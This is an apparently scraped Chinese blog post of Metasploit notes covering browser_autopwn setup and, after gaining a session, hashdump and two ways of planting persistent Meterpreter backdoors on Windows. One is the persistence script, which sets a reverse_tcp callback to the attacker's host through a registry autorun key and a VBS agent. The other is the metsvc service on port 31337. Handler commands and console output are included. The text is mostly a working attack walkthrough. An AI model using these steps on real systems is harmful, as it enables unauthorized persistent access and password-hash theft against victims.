zoukankan      html  css  js  c++  java
  • search autopwn

    search autopwn

     
    use server/browser_autopwn
     
    show options
     
    set LHOST 
     
    set SRVPORT
     
    set URIPATH /
     
    show options
     
    修改 etter.conf 文件
    if you use ipchains
    if you use iptables
     
     
     
     
     
     
     
    得到sessions后
     
    run hashdump
     
    run persistence -X -i 5 -p 445 -r 192.168.1.106
     
     
    Metasploit之建立backdoor一二
     
    1.meterpreter自带脚本 
     
    方法1.run presistence 
     
    可以使用run presistence -h查看选项: 
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139 
    [*] Running Persistance Script 
    [*] Resource file for cleanup created at 
    /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc 
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 
     
    LPORT=443 
    [*] Persistent agent script is 609496 bytes long 
    [+] Persistent Script written to C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [*] Executing script C:WINDOWSTEMPzvlYoXnVYFbR.vbs 
    [+] Agent executed with PID 3272 
    [*] Installing into autorun as HKCUSoftwareMicrosoftWindows 
    CurrentVersionRunFCBCUBtLrzFY 
    [+] Installed into autorun as HKCUSoftwareMicrosoftWindows 
     
    CurrentVersionRunFCBCUBtLrzFY
    可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。 
     
    连接: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LHOST 192.168.1.139 
    LHOST => 192.168.1.139 
    msf  exploit(handler) > set LPORT 443 
    LPORT => 443 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler...
    默认没启动,目标机重启后,可以成功获得meterpreter shell 
     
    方法2.run metsvc 
     
    执行metsvc 脚本 
     
    meterpreter > run metsvc -A 
    [*] Creating a meterpreter service on port 31337 
    [*] Creating a temporary installation directory C:WINDOWSTEMP 
     
    kqaqtcsWhBTbO... 
    [*]  >> Uploading metsrv.dll... 
    [*]  >> Uploading metsvc-server.exe... 
    [*]  >> Uploading metsvc.exe... 
    [*] Starting the service... 
       * Installing service metsvc 
    * Starting service 
    Service metsvc successfully installed. 
     
    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
    新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门: 
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
    成功连接 
  • 相关阅读:
    SQL Server AUTO_FIX_Login_Users
    SQL Server Always On 切换主机Login和User无法匹配解决方案
    SQL Server 目标主体名称不正确,无法生成 SSPI 上下文
    SQL Server Rebuild Index
    jqery和js如何判断checkbox是否选中 (转)
    jxl
    jxl 管理excel
    Bootstrap库之Modals
    jquery attr()
    js 验证数字(验证字符串是否是数字)
  • 原文地址:https://www.cnblogs.com/journeyIT/p/8259946.html
Copyright © 2011-2022 走看看